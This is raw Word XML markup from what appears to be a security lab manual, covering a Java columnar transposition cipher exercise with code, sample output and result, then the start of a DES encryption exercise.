          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>hello</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>world,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let</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr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11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>columnar transposition technique as shown below</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F276017" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="151"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="3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993"/>
        <w:gridCol w:w="849"/>
        <w:gridCol w:w="721"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A16F47" w14:paraId="1B10D6A1" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="321"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="991" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="249E50B0" w14:textId="77777777" w:rsidR="00A16F47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h</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="688A2D00" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="35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849" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17ED5AA1" w14:textId="77777777" w:rsidR="00A16F47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721" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07BA8F1C" w14:textId="77777777" w:rsidR="00A16F47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</w:tbl>
    <w:p w14:paraId="70068D77" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="45" w:after="1"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="3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993"/>
        <w:gridCol w:w="849"/>
        <w:gridCol w:w="721"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A16F47" w14:paraId="62256CB1" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="323"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="991" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="466E0A29" w14:textId="77777777" w:rsidR="00A16F47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93" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0688B185" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="18"/>
              <w:ind w:left="35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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="849" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="450F0100" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="18"/>
              <w:ind w:left="36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21" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BA633FD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="18"/>
              <w:ind w:left="40" w:right="1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</w:tr>
      <w:tr w:rsidR="00A16F47" w14:paraId="483B8D5F" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="321"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="991" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50C79ED6" w14:textId="77777777" w:rsidR="00A16F4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993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15255E19" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="35" w:right="1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849" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55979D34" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47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 w14:paraId="3476AF9B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47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</w:tbl>
    <w:p w14:paraId="2FAB5AF7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BCD8D52" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:line="232" w:lineRule="auto"/>
        <w:ind w:right="196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plain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11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placed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6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cipher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created with vertical format as: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>holewdlo lr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B36996" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1149"/>
        </w:tabs>
        <w:spacing w:before="5"/>
        <w:ind w:left="1149" w:hanging="429"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Now,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 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decrypt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cipher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plain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E6A7CA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="39"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03BFB373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6C53E5B1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="200"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="699FA9DD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr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TransCipher.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D447926" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="81"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36E875EE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="360" w:right="7731"/>
      </w:pPr>
      <w:r>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>java.util.*;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>class TransCipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F00FE1C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="917" w:right="4681" w:hanging="279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5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>= new Scanner(System.in); System.out.println("Enter the plain text"); String pl = sc.nextLine();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34213910" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:ind w:left="917" w:right="7918"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>sc.close();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">String </w:t>
      </w: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 xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7996D9D3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1198" w:right="6004" w:hanging="281"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-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pl.length();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7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if (pl.charAt(i) == ' ') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2F6AA4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="1478" w:right="5679"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>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pl.substring(start,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>i);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= i + 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551ADA23" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="44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022F5247" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="207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6C740DEF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="237"/>
        <w:ind w:left="917" w:right="5631"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">s = s + pl.substring(start); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>System.out.print(s);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>System.out.println();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B47871B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>//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rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>deletion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4216FC56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DB4DCE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="917" w:right="7554"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>k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s.length();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>int l = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26449428" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="42"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>col =</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF47E7A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7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s.length()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col;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A4CDC9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="917" w:right="5619"/>
      </w:pPr>
      <w:r>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ch[][]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char[row][col];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(int i = 0; i &lt; row; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A776C17" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="230"/>
        <w:ind w:left="1198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col;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2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 xml:space="preserve">{ if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>(l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127A808E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">k) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A28508" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:ind w:left="1757"/>
      </w:pPr>
      <w:r>
        <w:t>ch[i][j]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17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s.charAt(l);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>l++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D63548" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="41"/>
        <w:ind w:left="147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5C6FFE6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="1757"/>
      </w:pPr>
      <w:r>
        <w:t>ch[i][j]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'#';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E53D96C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="1478"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C8C6EB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="248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6E841889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5CAE2093" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="240"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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1F249B52" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="45"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A674C30" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="917" w:right="5720"/>
      </w:pPr>
      <w:r>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>trans[][]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char[col][row];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>for (int i = 0; i &lt; row; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E2BE81" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3" w:line="275" w:lineRule="exact"/>
        <w:ind w:left="1198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col;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1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 xml:space="preserve">{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>trans[j][i]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B3385F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="275" w:lineRule="exact"/>
        <w:ind w:left="1478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ch[i][j];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568688B9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023816D9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="204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3CD13D0D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="89"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="421FFABC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="237" w:lineRule="auto"/>
        <w:ind w:left="1198" w:right="6114" w:hanging="28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  <w:r>
        <w:rPr>
          <w:spacing w:val="3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(int j = 0; j &lt; row; j++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE2D510" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="1478"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>System.out.print(trans[i][j]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C14ADB1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605821D6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="207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3016F3F9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="237"/>
        <w:ind w:left="917" w:right="7261"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">// display </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>System.out.println();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9A5A24" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="4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6B810A3E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5072CD68" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr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EE360" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="78"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="365F91"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>OUTPUT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA5B67D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="36"/>
        <w:ind w:left="360" w:right="8078"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enter the plain text Security Lab </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>SecurityLab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Sreictuy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1256A05F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20531084" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DAD4DAE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C89C8C0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CE764F5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="164"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54190AE8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="275" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="365F91"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>RESULT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC44284" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360" w:right="783" w:firstLine="719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Transposition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Technique</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-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 implemented and the output verified successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0738B2CD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3004B8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Apply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practical </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E31BAB2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="87"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14D40CD1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25FC72B6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="79" w:line="280" w:lineRule="auto"/>
        <w:ind w:left="1080" w:right="783"/>
      </w:pP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(DES)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practica</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10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User Message Encryption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C98037" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="165"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D489E7D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="365F91"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>ALGORITHM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F4F973" w14:textId="77777777" w:rsidR="00A16F47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before="39" w:line="319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Key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32129B07" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="5" w:line="232" w:lineRule="auto"/>
        <w:ind w:right="3126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Cipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>instance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Cipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>class,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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 information and separated by a slash (/).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED224C0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1799"/>
        </w:tabs>
